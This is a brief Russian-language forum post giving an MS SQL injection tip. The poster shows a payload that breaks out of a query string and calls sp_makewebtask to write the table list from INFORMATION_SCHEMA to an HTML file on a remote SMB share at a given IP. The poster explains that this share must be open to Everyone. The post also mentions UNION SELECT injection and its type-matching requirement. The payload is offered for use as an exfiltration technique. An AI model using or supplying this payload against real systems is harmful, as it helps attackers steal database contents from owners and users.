Что-то мне сегодня захотелось сделать что-нибудь полезное
Можно использовать sp_makewebtask, чтобы записать ваш запрос в HTML:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

Указываемый IP должен иметь папку "share" с доступом для Everyone.

Хотя помнится я как-то и с union select развлекался, правда в postgres sql но погоды это не делает, ибо что в постгрис что в мсскл нужно чтобы типы всех параметров совпадали, так что не компостируй себе мозГ, читай http://www.securitylab.ru/analytics/216211.php